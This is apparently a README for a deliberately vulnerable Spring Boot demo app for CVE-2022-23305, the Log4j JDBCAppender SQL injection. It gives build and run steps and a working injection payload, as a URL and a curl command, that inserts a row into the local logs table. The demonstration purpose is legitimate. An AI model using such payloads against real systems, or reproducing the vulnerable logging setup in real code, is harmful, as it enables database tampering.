This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.
See src/main/java/poc/InjectionController.java for the logging statement.
See src/main/resource folder for all the configuration files.
You can run the application using Java and Maven by running "mvn clean spring-boot:run".
You can also run it as a Docker application such as:
docker build --tag log4j-poc .
docker run -p 8080:8080 log4j-poc
The app will be available at http://localhost:8080/.
To exploit the vulnerability, submit an injected sql statement as the parameter which is getting logged:
"http://localhost:8080/?param=');insert into logs values(':("
The return will list the added log entries, containing one that was added by the sql injected into the parameter.
To do the same with curl use:
curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('